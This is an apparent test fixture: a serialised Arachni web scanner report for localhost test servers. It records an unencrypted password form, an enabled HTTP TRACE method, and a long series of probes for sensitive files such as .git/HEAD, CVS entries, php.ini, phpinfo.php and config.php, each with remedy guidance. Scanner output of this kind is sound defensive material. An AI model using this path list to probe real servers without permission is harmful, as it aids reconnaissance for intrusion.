OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A9-Insufficient_Transport_Layer_Protection
var: insecure_2
url: http://localhost:11399/insecure
elem: form
method: GET
name: Unencrypted password form
description: Transmission of password does not use an encrypted channel.
tags:
- unencrypted
- password
- form
cwe: '319'
cwe_url: http://cwe.mitre.org/data/definitions/319.html
severity: Medium
remedy_guidance: Forms with sensitive content, like passwords, must be sent over
HTTPS.
mod_name: Unencrypted password forms
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A9-Insufficient_Transport_Layer_Protection
opts:
:var: !binary |-
aW5zZWN1cmVfMg==
:match: ! ""
:element: form
:regexp: ''
var: insecure_2
url: http://localhost:11399/insecure
injected:
id:
regexp: ''
regexp_match: ! ""
elem: form
remarks: {}
method: GET
response: ! " \n\n \n\n Will be ignored.\n \n"
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjY2
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0MSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Unencrypted password form
description: Transmission of password does not use an encrypted channel.
tags:
- unencrypted
- password
- form
cwe: '319'
cwe_url: http://cwe.mitre.org/data/definitions/319.html
severity: Medium
remedy_guidance: Forms with sensitive content, like passwords, must be sent over
HTTPS.
mod_name: Unencrypted password forms
variations: []
internal_modname: UnencryptedPasswordForms
internal_modname: UnencryptedPasswordForms
- !ruby/object:Arachni::Issue
verification: false
references:
CAPEC: http://capec.mitre.org/data/definitions/107.html
OWASP: http://www.owasp.org/index.php/Cross_Site_Tracing
var:
url: http://localhost:8905/
elem: server
method: TRACE
name: HTTP TRACE
description: ! "The HTTP TRACE method is enabled.\n This misconfiguration can
become a pivoting point for a Cross-Site Scripting (XSS) attack."
tags:
- xst
- methods
- trace
- server
cwe: '693'
cwe_url: http://cwe.mitre.org/data/definitions/693.html
severity: Medium
remedy_guidance: Disable the TRACE method if not required or use input/output validation.
mod_name: XST
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CAPEC: http://capec.mitre.org/data/definitions/107.html
OWASP: http://www.owasp.org/index.php/Cross_Site_Tracing
opts:
:element: server
:regexp: ''
var:
url: http://localhost:8905/
injected:
id:
regexp: ''
regexp_match:
elem: server
remarks: {}
method: TRACE
response: TRACE / HTTP/1.1
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0OCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: HTTP TRACE
description: ! "The HTTP TRACE method is enabled.\n This misconfiguration can
become a pivoting point for a Cross-Site Scripting (XSS) attack."
tags:
- xst
- methods
- trace
- server
cwe: '693'
cwe_url: http://cwe.mitre.org/data/definitions/693.html
severity: Medium
remedy_guidance: Disable the TRACE method if not required or use input/output
validation.
mod_name: XST
variations: []
internal_modname: XST
internal_modname: XST
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
url: http://localhost:10925/CVS/Root
elem: path
method: ''
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
opts:
:regexp: ''
url: http://localhost:10925/CVS/Root
injected: Root
id: Root
elem: path
remarks: {}
method: ''
response: CVS/Root
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations: []
internal_modname: CommonFiles
internal_modname: CommonFiles
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
url: http://localhost:10925/sitemap.xml.gz
elem: path
method: ''
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
opts:
:regexp: ''
url: http://localhost:10925/sitemap.xml.gz
injected: sitemap.xml.gz
id: sitemap.xml.gz
elem: path
remarks: {}
method: ''
response: sitemap.xml.gz
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTQ=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations: []
internal_modname: CommonFiles
internal_modname: CommonFiles
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
url: http://localhost:10925/phpinfo.php
elem: path
method: ''
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
opts:
:regexp: ''
url: http://localhost:10925/phpinfo.php
injected: phpinfo.php
id: phpinfo.php
elem: path
remarks: {}
method: ''
response: phpinfo.php
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations: []
internal_modname: CommonFiles
internal_modname: CommonFiles
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
url: http://localhost:10925/CVS/Repository
elem: path
method: ''
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
opts:
:regexp: ''
url: http://localhost:10925/CVS/Repository
injected: Repository
id: Repository
elem: path
remarks: {}
method: ''
response: CVS/Repository
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTQ=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations: []
internal_modname: CommonFiles
internal_modname: CommonFiles
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
url: http://localhost:10925/CVS/Entries
elem: path
method: ''
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
opts:
:regexp: ''
url: http://localhost:10925/CVS/Entries
injected: Entries
id: Entries
elem: path
remarks: {}
method: ''
response: CVS/Entries
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations: []
internal_modname: CommonFiles
internal_modname: CommonFiles
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
url: http://localhost:10925/.git/HEAD
elem: path
method: ''
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
opts:
:regexp: ''
url: http://localhost:10925/.git/HEAD
injected: HEAD
id: HEAD
elem: path
remarks: {}
method: ''
response: .git/HEAD
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations: []
internal_modname: CommonFiles
internal_modname: CommonFiles
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
url: http://localhost:10925/robots.txt
elem: path
method: ''
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
opts:
:regexp: ''
url: http://localhost:10925/robots.txt
injected: robots.txt
id: robots.txt
elem: path
remarks: {}
method: ''
response: robots.txt
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTA=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations: []
internal_modname: CommonFiles
internal_modname: CommonFiles
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
url: http://localhost:10925/sitemap.xml
elem: path
method: ''
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
opts:
:regexp: ''
url: http://localhost:10925/sitemap.xml
injected: sitemap.xml
id: sitemap.xml
elem: path
remarks: {}
method: ''
response: sitemap.xml
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations: []
internal_modname: CommonFiles
internal_modname: CommonFiles
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
url: http://localhost:10925/_mmServerScripts/MMHTTPDB.asp
elem: path
method: ''
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
opts:
:regexp: ''
url: http://localhost:10925/_mmServerScripts/MMHTTPDB.asp
injected: MMHTTPDB.asp
id: MMHTTPDB.asp
elem: path
remarks: {}
method: ''
response: _mmServerScripts/MMHTTPDB.asp
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mjk=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations: []
internal_modname: CommonFiles
internal_modname: CommonFiles
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
url: http://localhost:10925/_mmServerScripts/MMHTTPDB.php
elem: path
method: ''
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
opts:
:regexp: ''
url: http://localhost:10925/_mmServerScripts/MMHTTPDB.php
injected: MMHTTPDB.php
id: MMHTTPDB.php
elem: path
remarks:
:stuff:
- Blah
- Blah2
method: ''
response: _mmServerScripts/MMHTTPDB.php
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mjk=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations: []
internal_modname: CommonFiles
internal_modname: CommonFiles
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
url: http://localhost:10925/install.php
elem: path
method: ''
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
opts:
:regexp: ''
url: http://localhost:10925/install.php
injected: install.php
id: install.php
elem: path
remarks: {}
method: ''
response: install.php
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations: []
internal_modname: CommonFiles
internal_modname: CommonFiles
- !ruby/object:Arachni::Issue
verification: true
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
url: http://localhost:10925/php.ini
elem: path
method: ''
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
opts:
:regexp: ''
url: http://localhost:10925/php.ini
injected: php.ini
id: php.ini
elem: path
remarks: {}
method: ''
response: php.ini
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations: []
internal_modname: CommonFiles
internal_modname: CommonFiles
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
url: http://localhost:10925/config.php
elem: path
method: ''
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
opts:
:regexp: ''
url: http://localhost:10925/config.php
injected: config.php
id: config.php
elem: path
remarks: {}
method: ''
response: config.php
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTA=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations: []
internal_modname: CommonFiles
internal_modname: CommonFiles
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
url: http://localhost:10925/_mmDBScripts/MMHTTPDB.asp
elem: path
method: ''
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
opts:
:regexp: ''
url: http://localhost:10925/_mmDBScripts/MMHTTPDB.asp
injected: MMHTTPDB.asp
id: MMHTTPDB.asp
elem: path
remarks: {}
method: ''
response: _mmDBScripts/MMHTTPDB.asp
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjU=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
